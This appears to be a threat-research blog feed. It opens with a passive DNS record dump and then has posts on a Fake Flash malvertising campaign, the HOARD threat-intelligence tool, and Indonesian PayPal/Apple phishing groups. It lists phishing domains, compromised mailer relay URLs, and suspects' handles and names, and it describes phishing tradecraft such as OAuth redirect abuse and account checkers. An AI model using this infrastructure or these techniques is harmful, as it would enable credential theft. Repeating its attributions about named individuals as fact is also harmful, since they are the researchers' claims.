count	6251
first seen	2010-07-23 05:00:14 -0000
last seen	2016-09-23 08:36:45 -0000
`trump-email.com.`	`NS`	`ns1.cdcservices.com.`
`trump-email.com.`	`NS`	`ns2.cdcservices.com.`
`trump-email.com.`	`NS`	`ns3.cdcservices.com.`

bailiwick	trump-email.com.
count	166
first seen	2017-03-08 02:52:17 -0000
last seen	2017-03-18 02:23:26 -0000
`trump-email.com.`	`NS`	`ns33.domaincontrol.com.`
`trump-email.com.`	`NS`	`ns34.domaincontrol.com.`

bailiwick	trump-email.com.
count	113
first seen	2017-03-08 04:25:30 -0000
last seen	2017-03-17 21:40:00 -0000
`trump-email.com.`	`SOA`	`ns33.domaincontrol.com. dns.jomax.net. 2017030700 28800 7200 604800 600`

bailiwick	trump-email.com.
count	10
first seen	2014-11-02 07:51:23 -0000
last seen	2014-11-18 11:50:25 -0000
`trump-email.com.`	`SOA`	`ns1.cdcservices.com. postmaster.centralservices.local. 2012062509 1200 120 1209600 3600`

bailiwick	trump-email.com.
count	2106
first seen	2014-12-04 23:24:31 -0000
last seen	2016-09-23 13:47:43 -0000
`trump-email.com.`	`SOA`	`ns1.cdcservices.com. postmaster.centralservices.local. 2012062510 1200 120 1209600 3600`

bailiwick	trump-email.com.
count	1
first seen	2011-09-13 21:38:59 -0000
last seen	2011-09-13 21:38:59 -0000
`trump-email.com.`	`MX`	`10 mx20.cdcservices.com.`
`trump-email.com.`	`MX`	`20 mx21.cdcservices.com.`

bailiwick	trump-email.com.
count	18
first seen	2017-03-11 03:22:33 -0000
last seen	2017-03-17 21:40:00 -0000
`trump-email.com.`	`MX`	`0 smtp.secureserver.net.`
`trump-email.com.`	`MX`	`10 mailstore1.secureserver.net.`

bailiwick	trump-email.com.
count	12
first seen	2011-12-14 22:04:06 -0000
last seen	2016-09-23 08:36:45 -0000
`trump-email.com.`	`MX`	`10 incoming.cdcservices.com.`

bailiwick	trump-email.com.
count	10
first seen	2014-11-14 11:17:46 -0000
last seen	2016-09-23 12:59:33 -0000
`trump-email.com.`	`TXT`	`"Internet Solution from Cendyn.com."`
`trump-email.com.`	`TXT`	`"v=spf1 ip4:198.91.42.0/23 ip4:64.135.26.0/24 ip4:64.95.241.0/24 ip4:206.191.130.0/24 ip4:63.251.151.0/24 ip4:69.25.15.0/24 mx ~all"`

bailiwick	trump-email.com.
count	17
first seen	2011-05-07 03:06:37 -0000
last seen	2017-03-10 05:43:42 -0000
`www.trump-email.com.`	`CNAME`	`trump-email.com.`

bailiwick	trump-email.com.
count	2
first seen	2017-03-10 15:46:36 -0000
last seen	2017-03-10 15:46:36 -0000
`mail.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	4
first seen	2011-05-07 03:06:37 -0000
last seen	2016-09-23 12:10:41 -0000
`mail.trump-email.com.`	`CNAME`	`mx3.cdcservices.com.`

bailiwick	trump-email.com.
count	119
first seen	2012-12-19 15:37:59 -0000
last seen	2013-07-12 18:14:52 -0000
`_client._smtp.trump-email.com.`	`CNAME`	`trump-email.com.`

bailiwick	trump-email.com.
count	8
first seen	2017-03-08 23:40:31 -0000
last seen	2017-03-16 22:30:04 -0000
`links.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	163659
first seen	2010-07-05 07:37:16 -0000
last seen	2016-09-22 19:45:03 -0000
`links.trump-email.com.`	`CNAME`	`customers.listrak.com.`

bailiwick	trump-email.com.
count	20608
first seen	2010-07-02 19:20:22 -0000
last seen	2016-09-13 01:47:56 -0000
`mail1.trump-email.com.`	`A`	`66.216.133.29`

bailiwick	trump-email.com.
count	57
first seen	2017-03-08 04:32:26 -0000
last seen	2017-03-17 00:15:59 -0000
`mail1.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	2
first seen	2017-03-10 15:46:41 -0000
last seen	2017-03-10 15:46:41 -0000
`mail2.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	1
first seen	2017-03-17 21:40:00 -0000
last seen	2017-03-17 21:40:00 -0000
`ctudgrekow.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	2
first seen	2016-09-23 08:36:46 -0000
last seen	2016-09-23 08:36:46 -0000
`dw6w3yzfw6.trump-email.com.`	`CNAME`	`trump-email.com.`

bailiwick	trump-email.com.
count	5
first seen	2017-03-11 03:22:33 -0000
last seen	2017-03-11 03:22:33 -0000
`i6myzht210.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	5
first seen	2017-03-15 22:45:24 -0000
last seen	2017-03-15 22:45:24 -0000
`k8v362jbh7.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	2
first seen	2016-09-23 08:59:55 -0000
last seen	2016-09-23 08:59:55 -0000
`s4ddlkd49j.trump-email.com.`	`CNAME`	`trump-email.com.`

bailiwick	trump-email.com.
count	2
first seen	2016-09-23 08:56:36 -0000
last seen	2016-09-23 08:56:36 -0000
`t59hykhmfc.trump-email.com.`	`CNAME`	`trump-email.com.`

bailiwick	trump-email.com.
count	1
first seen	2017-03-17 21:18:09 -0000
last seen	2017-03-17 21:18:09 -0000
`thej35t3rpwns.trump-email.com.`	`A`	`184.168.221.46`

Returned 30 RRsets in 0.04 seconds.

↧

YAFF - Yet Another Fake Flash campaign

February 20, 2018, 1:07 pm

≫ Next: HOARD Concept Release

≪ Previous: Analysis of Trump's secret server story

By Andre' DiMino and Mila Parkour

At this point in Internet history, the prevalence of "Fake Flash" sites is certainly nothing new.
These Fake Flash sites attempt to trick a user into installing what they believe is an update to Adobe Flash. In reality, this "update" is a malicious payload that will compromise their computer.

A typical Fake Flash infection involves a malicious or compromised web site or embedded advertisement that redirects the user to a page indicating that the user's Adobe Flash player is out of date.
In some cases, there are several series of redirects until the final landing page is hit by the user.
This landing page typically is some variation of Figure 1 below.

Figure 1: Typical Fake Flash update page

The trusting user, (who is super eager to watch their Flash content) then clicks the update link at which point the malware is downloaded to the user's computer. Many varieties of malware, including ransomware and banking trojans have been delivered this way.
Most Fake Flash campaigns are initiated via advertising networks on sites that require Flash to view their content such as streaming movie sites and online games.

So while we don't want to re-hash old news and analysis of FakeFlash, we do wish to raise awareness of a very aggressive FakeFlash/malvertising campaign.
We also wished to provide some IOCs associated with this campaign.

A heavy wave of Fake Flash redirects appeared on our radar. Literally hundreds of redirects were seen from assorted domains, all with similar network traffic patterns.
Most all of these were associated with advertising redirects from online video streaming sites.
The landing page for these redirects were seen as either fake flash, Amazon gift card, or other malvertising type sites.

Tracing back the network traffic from the Fake Flash landing pages provided information on the redirections.
For example, the following images represent a typical redirection chain that we observed.
We are using CapTipper to present the HTTP sessions for the images.
Starting from the landing page and working up the chain:

Landing page for one redirect chain observed.

Second redirect

First redirect

Again tracing backward through all the network traffic, piecing together all the redirects and HTTP referer fields, we observed what appears to be the source for these malvertising redirects.

Note that a video from a streaming video website was the Referer in a GET request to jwljj.adsb4track[.]com. In almost every instance that we looked at, jwljj.adsb4track[.]com would redirect the browser to one of several domains. In the example above, the user was directed to srv79.admedit[.]net, which then continued the redirection as seen in the "First redirect" image above.

Other initial redirect domains seen are listed below.

We also noted that for browsing sessions that were not redirected to a fake flash site, the redirection was sent to a page on the domain bestabid[.]com. This page would redirect the browser to some malvertising, phish, or other traffic monetizing site.

For example, one redirect to the bestabid[.]com page yielded this HTML code:

Example of flash detect and redirect from bestabid[.]com
Note the tracking beacons at
mt.rtmark[.]net and my.rtmark[.]net

So since we've seen so many of these, we thought it would just be best to post some Snort signatures and IOCs associated with this campaign.

Snort Signatures

Many thanks to Andrei Kornev for his research assistance.

↧

HOARD Concept Release

June 24, 2018, 9:27 am

≫ Next: Uncovering A PayPal Phishing Campaign

≪ Previous: YAFF - Yet Another Fake Flash campaign

Introducing "Historical Observations of Actionable Reputation Data" (HOARD) - a new proof of concept that we've designed to help security defenders utilize Threat Intelligence (Observable and Indicator data) in new ways. We understand that there are a number of ways to address this challenge. The goal is not to come up with the next "Product X" - but to bring awareness to another use of threat intelligence (or reputation data).

Observable data is frequently identified by computer security devices, intrusion detection systems, and forensic investigators following an intrusion or other malicious event. When observable data is paired with contextual information it becomes an indicator. Indicators are usually given a reputation or risk score.

These Indicators are frequently classified with the industry term "threat Intelligence" and disseminated by both humans and machines to alert computer security teams about threats they may have been previously unaware of. STIX is a standard that is commonly used to communicate this type of data and inject it into security device pipelines.

Many computer security technologies will import this threat intelligence data and match it with same type observables. This has been done through Security Incident and Event Monitoring (SIEM) solutions, antivirus and network or system level intrusion detection systems. Unfortunately, most of this searching is forward focused.

The issue with forward focused analysis of indicators is the ephemeral nature. Once identified, an adversary may change their attack profile and in doing so they change the identified observables. This asserts that even the fastest sharing platforms are likely to become less effective in the hours to days following the initial discovery of a given observable.

HOARD aims to reduce the speed and storage limitations needed for quickly matching observable data with historical threats.

Once installed, the HOARD application will monitor log events in real time by monitoring a queuing system (Currently Redis) fed by RSYSLOG, Suricata or other technologies. Since context is not required for the initial searches, the application extracts and stores only the observable data identified by the analyst as being relevant. This immediately reduces the data stored to a manageable size and provides raw data that can be indexed in a probabilistic data structure known as sketches or Cuckoo Filters.

Once observable data has been added to a threat intelligence exchange platform or a security team has been alerted to an issue, a second application can be utilized to rapidly search back in time by querying the sketches to determine if the observable was probably seen in the past.

When a probabilistic match has been identified, the organizations Security Incident and Event Monitor (SIEM) is queried using the file date and timestamp information, this second query is used to validate the hit and provide context.

Keeping in mind cuckoo filters are probabilistic in nature, there will be false positives, but never false negatives. This rapid searching capability should be used to narrow down the potential timeframes at issue rather than relying on trigram or full context searches through an already taxed SIEM product.

Furthermore, these cuckoo filters/sketches can be provided to external organizations such as MSSPs, Incident Responders or Law Enforcement without exposing any organization or sensitive data.

HOARD is open source, GPLv3. We are releasing our operational POC in hopes that it will spark ideas and discussion among the security community. Our goal is implementation in a wide variety of products to continue to advance the future of threat intelligence and behavior or reputation matching on observable data.

Please head on over to our GitHub repo (https://github.com/deependresearch/hoard) to take a look at our POC.

↧

Uncovering A PayPal Phishing Campaign

July 20, 2018, 11:56 am

≫ Next: Indonesian Spam Communities

≪ Previous: HOARD Concept Release

While browsing the DC9723 group, we stumbled on a screenshot which one its group's members had just shared with the rest of the DefCon group. The group member had received what he claimed was a PayPal phishing email. He claimed he had received it in the previous day (July 14th) and that it contained a fake receipt for a purchase he had never made from an alleged Italian internet hosting company.

When we looked into this "Aruba IT." company - we saw that it actually was a legitimate internet hosting and domain registration company based out of Italy.
Which raised our curiosity to further look into the email itself and see if anything else could be recovered that points to any clues to this campaign, who else might be being used as a front, and if we can identify any malicious activity.

37219197_10156461903061894_5675719665855234048_o

The screenshot shared by the DC9723 user.

Fake Receipt Phishing

By using a fake receipt like this, an attacker wishes to alarm that a substantial purchase had just been made in the recipient's name. Hoping such a message will motivate the recipient into taking action where a more traditional phishing email might not.

The attacker in this case copied the main PayPal template for electronic receipts, by doing so the attacker wishes to scare the recipient into logging into the PayPal site and give away their credentials.

Conveniently so, as seen in the above screenshot, a line which isn't present in a real PayPal receipt had been added -

"You don't recognize this transaction? "with an embedded link that can be seen at the bottom of the email.

In all probability, this had been added to further guide the potential target along the attacker's desired path of action in which he'd like him to take; and it serves as correlated pretext to resolve this supposed receipt misunderstanding.

Upon a further look, we can also see this email contains some spelling mistakes and mistyped numbers. Perhaps intentional to add a state of confusion to the already dire financial situation the target could feel he is in, and an even further sense of urgency to resolve this whole issue. Or more likely this just means that this was recompiled in haste.

The reply emails: receipt@intl.paypai.com, noreply@intl.pavpal.com stand out as obvious spoofs.

pavpal[.]com had been seen in old phishing activity in the past and had since been registered by the actual PayPal company in probable efforts of blocking this type of activity.
paypai[.]com had also been observed in numerous scamming attempts and phishing campaigns with its domain belonging to Moniker Online Services.

https://myonlinesecurity.co.uk/fake-paypal-your-account-has-been-limited-leads-to-a-money-making-scam/

https://www.paypal-community.com/t5/PayPal-Basics/Spoof-Phishing-Emails-Tips-on-how-to-identify-amp-stay-protected/td-p/628490/page/5

Both are widely reported websites. This makes arriving to the conclusion if this attacker actually has current control of these email boxes very hard.

The embedded link to the fake PayPal resolution center this attacker chose to use was

based on Twitter's link shortener:

t[.]co/Tv5Zo3ig7v

Taking a peek at the link and looking at its redirect chain:

Source: urlscan.io

We can identify that the actual target domain was paypa[.]com-verifyseeds[.]support

Source: urlscan.io

By searching for similar pages based on the resource path we could identify similar domains being used in the past two weeks:

paypal[.]com-webapps[.]site
paypal[.]com-webappsinfo[.]reviews
paypa[.]com.lakukerascok[.]com
paypal.com[.]accountinfoverifysupport[.]info
paypal[.]com-accountverify[.]support
paypal.accountinfoverify[.]support
paypa[.]com-verifyseeds[.]support
paypal[.]com-verifyaccount[.]center/
paypal[.]com-accountservice[.]info

Along with the following redirects:

t[.]co-d3gbfd[.]city
t.co-d3gbfd[.]city/147/
huit[.]re/tettew
huit[.]re/shrt
huit[.]re/_Ebfo0oe
xt[.]lv/XJiEa
alif[.]idseedapp[.]in
huit[.]re/webappss
kuntulmaju[.]ml/cuk
huit[.]re/satumilyar
1.googleincsafe[.]org/brinjilan

https://ok[.]ru/dk?cmd=logExternal&st.cmd=logExternal&st.link=https%3A%2F%2Ft.co-d3gbfd.city%2F403&st.name=externalLinkRedirect&st.tid=68566299896757
https://ok[.]ru/dk?cmd=logExternal&st.cmd=logExternal&st.link=http://1.googleincsafe.org/kntlogeseng&st.name=externalLinkRedirect&st.tid=68261099042173&st._aid=WideFeed_openLink

Based on these different redirects made us suspect a phishing kit was being used here and spread during these couple of weeks.

The live domain which is currently still live and being used through the redirection chain is:

t[.]co-d3gbfd[.]city/147/

Which can be seen redirecting us to paypal.com-signinaccountsafe.info/stylec0de

www.paypa[.]com-verifyseeds[.]support - the redirection domain from our screenshot

Andwww.paypa[.]com.lakukerascok[.]com

Since the email was immediately reported to PayPal, we can witness the effectiveness of redirection chains to the longevity of phishing scams.

Both of these websites are hosted on the same Google server - 142.4.14[.]169

Along with a now empty Apache server:

All pointing to the same styled ‘/stylec0de’ path like the following full URI path example:

https://www.paypal[.]com/webapps/auth/protocol/openidconnect/v1/authorize?client_id=ATv4mHm-hSwKR8NFeKUJTagPctQ5ln4AExlRx3WY_ept7RIZVrA9FEr02IAnBjUd-cPTgck3TDqJbdG-&response_type=code&scope=openid%20profile%20email%20address%20phone&redirect_uri=https://www.paypal.com-signinaccountsafe.info/stylec0de

Using a redirection path utilizing Paypal’s own authentication API backbone to piggyback as a means of seemingly legitimate Paypal correspondence.

A victim looking to quickly resolve a financial issue might not go over the very long link, and miss the spoofed URL at the end of it - giving away his credentials to the attacker. By using a malicious iframe like this, a sophisticated campaign can be achieved relying on a victim’s

innocence.

Source code.

Screenshot of the Spoofed login page.

Twitter Activity

From this point on, we only had the now blocked websites left to go over, however since we can trace back activity to Twitter - we can actually hunt for anyone that was spreading these links and see if there’s any new activity, or maybe even find out who is behind this. This is due to the attacker’s choice of a t.co shortened link.

We were able to identify the following accounts that seem be based out of Indonesia:

https://twitter.com/StyleC0de
https://twitter.com/nugslackerc0de
https://twitter.com/shortermrguest
https://twitter.com/uboldmild
https://twitter.com/AqsaAssegaf

All of these accounts were using the same method and similar links. The original link from the screenshot could be found being spread by @uboldmild

Tweet of the original link.

As an elementary step of an investigation like this we checked for the usernames and names left by these individuals.

The Twitter user “Donna Curry” was registered under the handle ‘uboldmild’. Once we pivoted it to a simple search engine search, we managed to find it was connected to numerous phishing websites with the same scheme registered under the email uboldmild@yahoo.com.

Websites such as :

step-verivy[.]com
app-recoveryicloud[.]com
data-recoveryicloud[.]com
idmsa-accounts-security[.]com
datarecoveryicloud[.]com
com-verifyaccountappstore[.]info
responsibilitiesmacintosh[.]com

By looking at the Twitter account we can further correlate this by looking at what sort of links have been tweeted out by the user:

With what looks like the first tweet being made to test out how the link shortener works on June 2017.

This shows us how the phishing kits they used may have evolved along the past year, the same initial weaponization point of utilizing Twitter’s link shortener had not.

When checking the rest of the users, we found that the user @StyleC0de has been doing the same - which can be seen through his Twitter account as well, however, he has done so under his actual name which can be traced back to numerous social media profiles he has under his name. Including a Youtube video showing a script he intended to sell in 2017:

https://www.youtube.com/watch?v=agJxjXoUfBY

His latest exploit which was still live when we were writing this post is the one we showed you under his still currently used username/calling card ‘StyleC0de’.

SlackerC0de spam group

SlackerC0de is an Indonesian hacking group popping into activity around 2015 with various low level scripts aimed at financial scams.

When we checked the user @nugslackerc0de from Twitter, his username stood out as well. This was what led us to the Indonesian group which can be found at slackerc0de.us - and this group might actually prove to be the potential connection point between these Indonesian users.

An Apple account checker script shared on Pastebin.

The main name that kept popping up at various source codes belonging to the group was a ‘Malhadi Jr.’ with websites like malhadi.slackerc0de.us hosting online tools like email bots and account checkers. Along with even an old personal Github account - https://github.com/MalhadiJr sharing similar repositories.

We managed to see that one of his tools was used for a phishing website last year with a similar URL.

Source: ServiceHostNet

So when considering our recent finding, it indeed seemed to us like the Slackerc0de group was a key factor in identifying the common points between the different users.

Slackerc0de themselves invite any prying eyes to a public group on Telegram where they share their tools of the trade.

When we peeked inside the group, we were able to see behind the scenes of a relatively close knit group collaborating in phishing efforts, like this user asking what a good subject for Yahoo email recipients is:

A now deleted user instructing another member on his preferred link shorteners like Twitter and Owly:

And another one sharing PayPal Phishing Kit’s source code for download:

A user sharing a screenshot of using a mailer with their Apple phishing website present in the background:

We can see this Indonesian group is active with focused efforts in cheating people out of their money, adding insult to injury with boasting their success while sharing screenshots of incoming credentials:

An attacker sharing his harvested credentials.

Tactics,Techniques, and Procedures

This group and those like it operate by initially gathering email lists, ones that can be curated manually, or downloaded from the various cyber crime forums online. Once they have an adequate enough list they will move to their next step - checking the emails for corresponding accounts. They will input the emails they have into account checkers made by the likes of Malhadi Jr from SlackerC0de and see what emails have PayPal accounts, what emails have Apple accounts by utilizing various API calls to these services and see their response. Both these companies seem to be their favorite targets.

Once they have amassed a large enough list to move on and start attacking them, these attackers will create a phishing infrastructure for the most crucial steps of their campaign. They will create an online website, mostly hosted by Amazon,Google, or Aruba (the same company they used as a fake receipt for one of their emails) from looking at how this specific group operates. They will host their phishing kit and start mass emailing their list using a bought emailer software from their closed forum marketplace or shared by somebody from the chat group.

To receive the incoming credentials they manage to steal, they will set up an inbox based on free email services like Yandex. Not much skill is needed to run such a scheme - they will need to only configure the source code for their email, upload to a server, and use an email template. By going over their correspondence we saw how users with no skill whatsoever were asking for resources,more experienced users sharing them, and the backbone to these groups - the tool creators or sellers which supply the 955 members of the group with the easy means of creating their own campaign.

We witnessed how they share their various setbacks after they launch their campaign, such as Amazon blocking their accounts, screwing up the %email field, failing to configure a server, and more. Meaning even an attacker at the lowest level of skill will be spoon fed the answer to his mistake and how to correct it for the campaign to work. Causing dire consequences to the victims which fall due to this criminal crowdsourcing.

An attacker sharing a screen capture of his Phishing email.

An attacker sharing a screenshot in hopes of troubleshooting an error.

An attacker sharing a screenshot of his blocked Amazon account.

Historical Observations

We then tried to look for historical correlation and past activity this group may have been connected to, so we started looking through RecordedFuture’s threat intelligence platform for further relationships and activity.

When we initially looked at the main domain - we were looking for what malware RecordedFuture may have seen connected to SlackerC0de[.]us, if any at all. In this case we were able to see that some ransomware activity and various intertwined domains were connected to SlackerC0de[.]us.

Source: RecordedFuture

So we continued to look for connected phishing campaigns, and saw that prior to the July 2018 PayPal and Apple campaign that started our investigation, the group ran earlier campaigns in January - mainly targeting Apple and Facebook users.

Source: RecordedFuture

Meaning this group is probably constantly busy all year round targeting all the varied popular services in efforts of scamming people out of their money and credentials.

IOCs

t[.]co-d3gbfd[.]city

www.paypal.com-appredno[.]info

source-notice[.]ldweblogin.appleid.ldapple.idwebtrue-loginid[.]com

www.pyapal[.]com-websecurity[.]app

r2.direckkuy1[.]net

r1.direckkuy1[.]co

www.paypal[.]com-serviceart[.]tech

www.paypal[.]com-serviceart[.]co

www.paypal[.]com-appredasu[.]center

www.paypa[.]com-accountverify[.]info

www.paypal[.]com-unauthorized-activity[.]com

www.pyapal[.]com-unauthorized-activity[.]report

www.paypal[.]com-resolution-centers[.]com

www.paypal[.]com-accsuired[.]center

a.redirkues[.]com
www.paypa.com-verifyinc[.]net

www.paypal[.]com-webbapps[.]center

www.paypa.com-accountverify[.]net

www.paypal.com-webappseeds[.]info

www.paypal.com-webapps-security[.]tools

mail.directseeds[.]in

www.paypal.co.uk-service[.]solutions

www.paypal.co.uk-service[.]info

direku.2.co-d3gbfd[.]in

direku.1.co-d3gbfd[.]in

www.paypal.co.uk-service[.]center

www.paypal.com-verifyseeds[.]support

www.paypal.com-accountverify[.]info

www.paypa.com-verifyseeds[.]support

www.paypal.com-verifyaccount[.]in

www.paypal.com-signinaccountsafe[.]info

www.paypa.com.lakukerascok[.]com

www.paypal.com-webappsloginaccount[.]support

www.paypal.com-webappsloginaccount[.]systems

t.co-d3gbfd[.]cc

142-4-14-169.unifiedlayer[.]com

jancokkoen[.]com

shirtmy[.]com

Lakukerascok[.]com

com-signinaccountsafe[.]info

nugra-saputra[.]com

Paypal-customer-confirm[.]com

paypal.com-webapps[.]site

paypal.com-webappsinfo[.]reviews

paypa.com.lakukerascok[.]com

paypal.com.accountinfoverifysupport[.]info

paypal.com-accountverify[.]support

paypal.accountinfoverify[.]support

paypa.com-verifyseeds[.]support

paypal.com-verifyaccount[.]center/

paypal.com-accountservice[.]info

142.4.14[.]169

3ef2bd65e746676d25e7d6e017b03cdb7b906e6de5559cffae43f03142617395

Redirects:

t.co-d3gbfd[.]city

huit[.]re/tettew

huit[.]re/shrt

huit[.]re/_Ebfo0oe

xt[.]lv/XJiEa

alif.idseedapp[.]in

huit[.]re/webappss

kuntulmaju[.]ml/cuk

huit[.]re/satumilyar

1.googleincsafe[.]org/brinjilan

DeepEnd Research has already notified Apple and PayPal of these findings prior to the publication of this post.

↧

Indonesian Spam Communities

September 5, 2018, 1:00 pm

≫ Next: Renewed SideWinder Activity in South Asia

≪ Previous: Uncovering A PayPal Phishing Campaign

In our last post we tried to shed some light at what seemed to appear as a very common PayPal phishing email at first glance, but evidently turned out to be connected to a quite larger and more unique campaign the deeper we looked at. When we investigated that single email, we were actually able to discover a wide ranging spam group originating from Indonesia which looked to be responsible for the phishing activity we originally saw. Through that seemingly common PayPal phishing email, we found out that an Indonesian group was targeting various well-known companies’ customer base by mass sending phishing emails via uniquely identifiable Twitter shortened URL redirections.

They have done so with great success, as we demonstrated by showing you some of the attacker’s self-shared screenshots of incoming victim credit card information. And we last left off by identifying some additional Twitter handles spreading phishing links and hunting some more connected infrastructure to that specific campaign.

Since our last update on the matter, we’ve continued to monitor this group’s activity, passing along our findings to relevant parties. However, in the process of studying this group, we’ve also discovered a secondary set of the Indonesian spamming community in addition to the already identified SlackerC0de and Spammer ID from our previous post. This secondary group uses a set of slightly different tools and techniques, but stays true to the identical core of collective financial scamming efforts which we've previously written about.

SendInbox
While we were looking at what the Spammer ID guys were doing in their group, we saw that they began discussing an additional mailing tool they were using called "Sendinbox". Up to this point we saw that they were mainly sharing their use of mailing tools like "heart sender" and "GX40 sender". We've also seen the Spammer ID group try and use XAMPP with sendmail from their localhost relaying through SlackerC0de infrastructure. They used these methods along with web based tools on their group websites like the ones we saw them make available on tool[.]slackerc0de[.]us. When we took a look at what "Sendinbox" was - we saw that it was a PHP tool based on the popular PHPMailer library. After we started going through the group's chat we witnessed them discuss how they're setting this tool through their shared group servers mainly using Apple and PayPal phishing letters as their payload.

As you can see from the above screenshots, the 'Sendinbox' tool lets the attacker send a set of many emails at once with a preconfigured scam message through mail relay servers. In this example an attacker is testing if his emails are being received as regular inbox mails or filtered as spam to his own Yahoo account. We kept seeing this type of "QA" process being taken by the different stages of server changes by the attackers.

BMarket ID
"Sendinbox" is made by an "Eka Syahwan" who runs a separate community of groups to Spammer ID on various social platforms. The main purpose for this being to provide support for his user base to whom he sold his mailer tool. A happy customer in this case brings in more potential buyers. The main website for this community - Bmarket[.]or[.]id also hosts a relay server for email campaigns hxxp://bmarket[.]or[.]id/sendinbox-server[.]php

A close knit user base such as this offers the potential scammer support for his phishing campaigns, the tool creator provides updates to the tool and workarounds to potential service blocks. Which kept amounting the more we looked at their group correspondence. Group members complained that the provided email servers were not mailing their scams successfully or that they're going to spam folders. So we witnessed a heavy shift from the recognized servers like bmarket[.]or[.]id to group members actively looking for compromised servers to relay their emails.

Group members such at the one above started looking for compromised servers to upload their sendinbox tool for future campaign use and shared them with the group. Once they've gained their successful hold on a compromised website, they uploaded their SendInbox email tool as can be seen below.

Other members also shared their use of vulnerability scanning tools to hunt for potential servers in the group chat.

Along with the proactive hunting these group members were conducting, they were monitoring another website belonging to the "Sendinbox" tool creator called IndoXploit which listed additional compromised servers for them to use in their phishing campaigns.

Eka Syahwan even lists this fact on his personal Facebook profile, along with regular updates to his scamming activity, as we can see in his most recent warning post about some rippers that recently tried to do business with him on Telegram:

Since this is a smaller community with a tendency to share their success and failures a little bit more than Spammer ID - it made it easier for us to track what they were doing in their campaigns. And this group was definitely busy - we've seen them successfully harvest many CC records via targeted email lists, ranging from alphabetically ordered emails to emails from specific sectors like large educational institutions in the US.

An email list an attacker has prepared to massively spam his phishing letters. This list is alphabetically ordered Yahoo accounts which were already validated as Apple users.

We've witnessed this group target specific sectors or user base, such as in the below example of them targeting specifically Japanese users from IT provider Softbank Japan:

This group is also sophisticated enough to socially engineer the appropriate letters for a geographically and linguistic group like these Japanese Apple users as we picked them testing out various Japanese templates, how they're received in a Japanese Yahoo, and bouncing if possible off Japanese accounts.

Successfully harvested credentials received in an attacker's email.

We only were able to look at the shared incoming credentials in the group chats, which amounted to hundreds of victims by our count. If we were to combine the credentials which weren't being shared it probably would make the true number of their victims much higher than that.

Conclusions
Traditional phishing hunting operations tend to rely on certificate and brandname watching. This tactic offers to usually be quite successful since phishing domains don't tend to have a lifespan larger than a day or two, and if by any chance the phishing page wasn't hunted, it at least is usually reported as fake by wary users.
The threat that closed scamming communities such as BMarket poses is the advantage of crowdsourcing their setbacks and problems. While a single and lone scammer might quit after being unsuccessful in his attack, a strong base of experienced users, and in this case a tool creator looking to satisfy his clients will immediately fix what is being broken or detected by phish domain watchers. It also offers some confidentiality to their operations. A small group such as this is harder to track when it doesn't make much noise beyond their chat platforms. While some of their phishing domains are quickly identified, when looking at their operations - we saw that a lot of Apple and PayPal customers still fell victim to their ploy. We also think this is due to this group's heavy use of shortened and redirected links.
In the grander scheme of the cybercrime landscape, it seems that relying on passive hunting may not replace actively tracking and infiltrating cybercrime groups to successfully mitigate some parts of phishing activity such as this.

IOCs

Twitter handles connected to this group:
https://twitter.com/belajargila3
https://twitter.com/nawalbelh
https://twitter.com/johanes95826552
https://twitter.com/jancoek14
https://twitter.com/rohmatizud
https://twitter.com/Ongki54705384
https://twitter.com/test19259665
https://twitter.com/wibowoandy14
https://twitter.com/baringinasido
https://twitter.com/PnatekM
https://twitter.com/bambangkou
https://twitter.com/Bajungan1
https://twitter.com/dzakialvriano1
https://twitter.com/bastian55115067
https://twitter.com/pea_sang
https://twitter.com/yusupmuhammad23
https://twitter.com/akibernad
https://twitter.com/XCrow8
https://twitter.com/backes_oswald
https://twitter.com/kontolklean
https://twitter.com/AHarsakti

Phishing Domains:
manageaccountclient[.]com
appleid.apple.com.login.contact-support[.]email
anakperawan[.]business
id.apple.com-en.manage.trying-verif[.]net
panca-sakti.ac.id/wp-plugin[.]php
pymntspprtverifycnt.webhop[.]me
app-idnscj-34[.]com/?16shop
updatepaymentslockaccountsprimarry.promisetcechprofile[.]com/?desacoli/?manage

updatepaymentprifleyouraccounts.aenjay[.]com/?selimutbiru
home-pavypal.com-acknowledge[.]info
kontol.jepat.cgi-account-notification[.]ga
login-appleitunesap.servehttp[.]com
itunes-storeapple.servehttp[.]com
appleservicess-comfrimation[.]com
amazon-service-server.usa[.]cc
paypal-resolved-limited-com-ah581h8gda87weg9i8tacyuabwe.intoleratne[.]com
secure-apple.com.webapps-support-account[.]com
appleid-apple.comsign-id[.]gq
maintenance-servicesupport[.]com
secure-apple.com.maintenance-servicesupport[.]com
paypal.com-webs.app-logininformation.trying-verif[.]info
webapps-support-account[.]com
account-reportsummaryid[.]com
accountlimitedrecovery[.]com
subscription-accept[.]com
support.apple-verification.com.kuinginmencintainyatapiadaorangkedua12[.]org
accountinformationappupdate[.]ga
security-account-appleid-apple[.]com
appidaccountlaert-helpmanageupdate[.]com
paypal.com-useraccess.rabiverivcationc[.]com
payment-appleid-apple[.]store
appidaccountalert-manageupdateinfo[.]com
manage-accountv-apple[.]com
162.144.52.238
35.199.147.246
142.93.86.114
192.163.201.156

Used Mailing Infrastructure:
www.ingemetal[.]com[.]ve/sendinbox-server.php
kamullflauge[.]com/mailer/sendinbox.php
bondiicerink[.]starsonice[.]com[.]au/tickets/sendinbox-server[.]php
bmarket[.]or[.]id/sendinbox-server[.]php
bbsp[.]co[.]id/sendinbox-server[.]php
thealmondslices[.]com/wp-content/plugins/simple/sendinbox-server[.]php
www.bang-pa[.]com/sendinbox-server[.]php
www.ingemetal[.]com[.]ve/sendinbox-server.php
http://ts666[.]tw/cgi-bin/wp-back.php
http://xn--uis74a0us56agwen8q[.]tw/cgi-bin/wp-back.php
http://xn--uis76c70xigmku7b[.]tw/cgi-bin/wp-back.php
http://ts886[.]net/cgi-bin/wp-back.php
http://xn--uisz5ba41c994d[.]com/cgi-bin/wp-back.php
http://ts5588[.]in/cgi-bin/wp-back.php
https://e-riset.litbang.kemkes[.]go[.]id/red.php?ID

transzach[.]com

khatlon[.]tj
pbonline[.]net
suppoters-values[.]flights
thealmondslices[.]com
portaldosurdo[.]com
lagacetadelporno[.]com
kubotalubbock[.]net
devsaad[.]com

ace-academy[.]org

justessex[.]co[.]uk
mothermyrle[.]com
dclmhub[.]org

soriko[.]bg
